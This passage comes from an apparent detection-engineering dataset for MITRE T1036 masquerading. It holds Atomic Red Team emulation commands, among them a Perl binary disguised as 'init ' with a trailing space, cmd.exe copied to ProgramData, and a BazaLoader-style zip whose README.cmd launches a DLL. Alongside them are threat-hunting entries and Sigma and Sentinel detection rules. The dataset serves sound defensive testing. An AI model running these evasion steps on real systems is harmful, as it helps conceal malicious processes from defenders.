/init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" + ], + "commands": [ + { + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "source": "atomics/T1036.006/T1036.006.yaml", + "name": "Atomic Red Team Test - Masquerading: Space after Filename" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.006", + "display_name": "Masquerading: Space after Filename", + "atomic_tests": [ + { + "name": "Space After Filename (Manual)", + "auto_generated_guid": "89a7dd26-e510-4c9f-9b15-f3bae333360f", + "description": "Space After Filename\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. echo '#!/bin/bash\\necho \"print \\\"hello, world!\\\"\" | /usr/bin/python\\nexit' > execute.txt && chmod +x execute.txt\n\n2. mv execute.txt \"execute.txt \"\n\n3. 
./execute.txt\\ \n", + "name": "manual" + } + }, + { + "name": "Space After Filename", + "auto_generated_guid": "b95ce2eb-a093-4cd8-938d-5258cef656ea", + "description": "Space after filename.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "cleanup_command": "rm -rf /tmp/atomic-test-T1036.006" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036", + "command_list": [ + "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "*.exe", + "\\Recycle.bin", + "\\Users\\All 
Users\\", + "\\Users\\Default\\", + "\\Users\\Public\\", + "\\Perflogs\\", + "\\config\\systemprofile\\", + "\\Windows\\Fonts\\", + "\\Windows\\IME\\", + "\\Windows\\addins\\", + "\\ProgramData\\", + "csrsr.exe", + "csrss.exe", + "!=*\\Windows\\System32\\", + "cssrss.exe", + "explorer.exe", + "iexplore.exe", + "isass.exe", + "lexplore.exe", + "lsm.exe", + "lssass.exe", + "mmc.exe", + "!=wininit.exe", + "lsass", + "run32dll.exe", + "rundII.exe", + "scvhost.exe", + "smss.exe", + "!=services.exe", + "svchost.exe", + "svchosts.exe" + ], + "commands": [ + { + "command": "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "source": "atomics/T1036/T1036.yaml", + "name": "Atomic Red Team Test - Masquerading" + }, + { + "command": "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "source": "atomics/T1036/T1036.yaml", + "name": "Atomic Red Team Test - Masquerading" + }, + { + "command": "*.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\Recycle.bin", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\All Users\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\Default\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Users\\Public\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Perflogs\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\config\\systemprofile\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Windows\\Fonts\\", + "source": "Threat Hunting Tables", + "name": 
"file_path" + }, + { + "command": "\\Windows\\IME\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\Windows\\addins\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "\\ProgramData\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "csrsr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "csrss.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "!=*\\Windows\\System32\\", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "cssrss.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "explorer.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "iexplore.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "isass.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lexplore.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lsm.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lssass.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "mmc.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "!=wininit.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "lsass", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "run32dll.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "rundII.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "scvhost.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "smss.exe", + "source": "Threat Hunting Tables", + 
"name": "parent_process" + }, + { + "command": "!=services.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "svchost.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "svchosts.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036", + "display_name": "Masquerading", + "atomic_tests": [ + { + "name": "System File Copied to Unusual Location", + "auto_generated_guid": "51005ac7-52e2-45e0-bdab-d17c6d4916cd", + "description": "It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "cleanup_command": "remove-item \"$env:allusersprofile\\cmd.exe\" -force -erroraction silentlycontinue", + "name": "powershell" + } + }, + { + "name": "Malware Masquerading and Execution from Zip File", + "auto_generated_guid": "4449c89b-ec82-43a4-89c1-91e2f1abeecc", + "description": "When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. 
This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "Location of zip file", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip" + } + }, + "dependencies": [ + { + "description": "Zip file must be present.", + "prereq_command": "if (Test-Path $env:userprofile\\Downloads\\T1036.zip) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -OutFile \"$env:userprofile\\Downloads\\T1036.zip\" #{url}\n" + } + ], + "executor": { + "command": "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "cleanup_command": "taskkill /IM Calculator.exe /f >$null 2>$null\nRemove-Item $env:userprofile\\Downloads\\T1036 -recurse -ErrorAction Ignore", + "name": "powershell" + } + } + ] + }, + { + "chain_id": "100002", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Recycle.bin", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100003", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\All Users\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100004", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": 
"", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\Default\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100005", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Users\\Public\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100006", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Perflogs\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100007", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\config\\systemprofile\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100008", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Windows\\Fonts\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100009", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + 
"file_path": "\\Windows\\IME\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100010", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\Windows\\addins\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100011", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "\\ProgramData\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100021", + "os": "windows", + "parent_process": "csrsr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100022", + "os": "windows", + "parent_process": "csrss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100023", + "os": "windows", + "parent_process": "cssrss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": 
"masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100033", + "os": "windows", + "parent_process": "explorer.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100035", + "os": "windows", + "parent_process": "iexplore.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100036", + "os": "windows", + "parent_process": "isass.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100037", + "os": "windows", + "parent_process": "lexplore.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100038", + "os": "windows", + "parent_process": "lsm.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100039", + 
"os": "windows", + "parent_process": "lssass.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100040", + "os": "windows", + "parent_process": "mmc.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "!=*\\Windows\\System32\\", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100050", + "os": "windows", + "parent_process": "!=wininit.exe", + "commandline_string": "", + "sub_process_1": "lsass", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "https://digital-forensics.sans.org/media/dfir_poster_2014.pdf" + }, + { + "chain_id": "100071", + "os": "windows", + "parent_process": "run32dll.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100072", + "os": "windows", + "parent_process": "rundII.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100075", + "os": "windows", + "parent_process": "scvhost.exe", + 
"commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100077", + "os": "windows", + "parent_process": "smss.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100078", + "os": "windows", + "parent_process": "!=services.exe", + "commandline_string": "", + "sub_process_1": "svchost.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + }, + { + "chain_id": "100079", + "os": "windows", + "parent_process": "svchosts.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "masquerading", + "mitre_attack": "T1036", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \".doc.\"or process_path contains \".docx.\"or process_path contains \".xls.\"or process_path contains \".xlsx.\"or process_path contains \".pdf.\"or process_path contains \".rtf.\"or process_path contains \".jpg.\"or process_path contains \".png.\"or process_path contains \".jpeg.\"or process_path contains \".zip.\"or process_path contains \".rar.\"or process_path contains \".ppt.\"or process_path contains \".pptx.\")", + "name": "Masquerading Extension" + }, + 
{ + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and (process_path contains \"SysWOW64\"or process_path contains \"System32\"or process_path contains \"AppData\"or process_path contains \"Temp\")and (file_name contains \".exe\"or file_name contains \".dll\"or file_name contains \".bat\"or file_name contains \".com\"or file_name contains \".ps1\"or file_name contains \".py\"or file_name contains \".js\"or file_name contains \".vbs\"or file_name contains \".hta\")", + "name": "Masquerading Location" + } + ], + "possible_detections": [ + { + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "references": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A" + ], + "tags": [ + "attack.defense_evasion", + "attack.g0035", + "attack.t1036", + "car.2013-05-009" + ], + "author": "Florian Roth", + "date": "2017/10/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "ps.exe -accepteula" + }, + "condition": "selection" + }, + "falsepositives": [ + "Renamed SysInternals tool" + ], + "level": "high" + }, + { + "title": "Masquerading as Linux crond process", + "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "status": "experimental", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. 
Several different variations of this technique have been observed.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "execve", + "a0": "cp", + "a1": "-i", + "a2": "/bin/sh", + "a3": "*/crond" + }, + "condition": "selection" + }, + "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + { + "title": "Renamed ProcDump", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "experimental", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "references": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump" + ], + "author": "Florian Roth", + "date": "2019/11/18", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "OriginalFileName": "procdump" + }, + "filter": { + "Image": [ + "*\\procdump.exe", + "*\\procdump64.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Procdump illegaly bundled with legitimate software", + "Weird admins who renamed binaries" + ], + "level": "critical" + }, + { + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "experimental", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "references": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100" + ], + "author": "Florian Roth", + "date": "2018/02/22", + "tags": [ + "attack.defense_evasion", 
+ "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\WINWORD.EXE", + "Image": "*\\MicroScMgmt.exe " + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "PowerShell Base64 Encoded Shellcode", + "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "description": "Detects Base64 encoded Shellcode", + "status": "experimental", + "references": [ + "https://twitter.com/cyb3rops/status/1063072865992523776" + ], + "author": "Florian Roth", + "date": "2018/11/17", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*AAAAYInlM*" + }, + "selection2": { + "CommandLine": [ + "*OiCAAAAYInlM*", + "*OiJAAAAYInlM*" + ] + }, + "condition": "selection1 and selection2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "experimental", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", + "references": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/" + ], + "date": "2019/02/23", + "modified": "2019/08/20", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\svchost.exe", + "*\\taskhost.exe", + "*\\lsm.exe", + "*\\lsass.exe", + "*\\services.exe", + "*\\lsaiso.exe", + "*\\csrss.exe", + 
"*\\wininit.exe", + "*\\winlogon.exe" + ] + }, + "filter": { + "ParentImage": [ + "*\\System32\\\\*", + "*\\SysWOW64\\\\*", + "*\\SavService.exe", + "*\\Windows Defender\\\\*\\MsMpEng.exe" + ] + }, + "filter_null": { + "ParentImage": null + }, + "condition": "selection and not filter and not filter_null" + }, + "falsepositives": [ + "Some security products seem to spawn these" + ], + "level": "low" + }, + { + "title": "Renamed Binary", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "experimental", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27", + "date": "2019/06/15", + "references": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "OriginalFileName": [ + "cmd.exe", + "powershell.exe", + "powershell_ise.exe", + "psexec.exe", + "psexec.c", + "cscript.exe", + "wscript.exe", + "mshta.exe", + "regsvr32.exe", + "wmic.exe", + "certutil.exe", + "rundll32.exe", + "cmstp.exe", + "msiexec.exe", + "7z.exe", + "winrar.exe" + ] + }, + "filter": { + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\powershell_ise.exe", + "*\\psexec.exe", + "*\\psexec64.exe", + "*\\cscript.exe", + "*\\wscript.exe", + "*\\mshta.exe", + "*\\regsvr32.exe", + "*\\wmic.exe", + "*\\certutil.exe", + "*\\rundll32.exe", + "*\\cmstp.exe", + "*\\msiexec.exe", + "*\\7z.exe", + "*\\winrar.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + ], + "level": "medium" + }, + { + "title": "Execution of Renamed PaExec", + "id": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "status": "experimental", + "description": "Detects execution of renamed paexec via imphash and executable product string", + "references": [ + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "FIN7", + "car.2013-05-009" + ], + "date": "2019/04/17", + "author": "Jason Lynch", + "falsepositives": [ + "Unknown imphashes" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Product": [ + "*PAExec*" + ] + }, + "selection2": { + "Imphash": [ + "11D40A7B7876288F919AB819CC2D9802", + "6444f8a34e99b8f7d9647de66aabe516", + "dfd6aa3f7b2b1035b76b718f1ddc689f", + "1a6cca4d5460b1710a12dea39e4a592c" + ] + }, + "filter1": { + "Image": "*paexec*" + }, + "condition": "(selection1 and selection2) and not filter1" + } + }, + { + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "description": "Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "status": "experimental", + "references": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448" + ], + "author": "Florian Roth", + "date": "2019/02/09", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*\\calc.exe *" + }, + "selection2": { + "Image": "*\\calc.exe" + }, + "filter2": { + "Image": "*\\Windows\\Sys*" + }, + "condition": "selection1 or ( selection2 and not filter2 
)" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "status": "experimental", + "references": [ + "https://twitter.com/SBousseaden/status/1094924091256176641" + ], + "author": "Florian Roth", + "date": "2019/02/11", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\csc.exe*", + "ParentImage": [ + "*\\wscript.exe", + "*\\cscript.exe", + "*\\mshta.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Executables Started in Suspicious Folder", + "id": "7a38aa19-86a9-4af7-ac51-6bfe4e59f254", + "status": "experimental", + "description": "Detects process starts of binaries from a suspicious folder", + "author": "Florian Roth", + "date": "2017/10/14", + "modified": "2019/02/21", 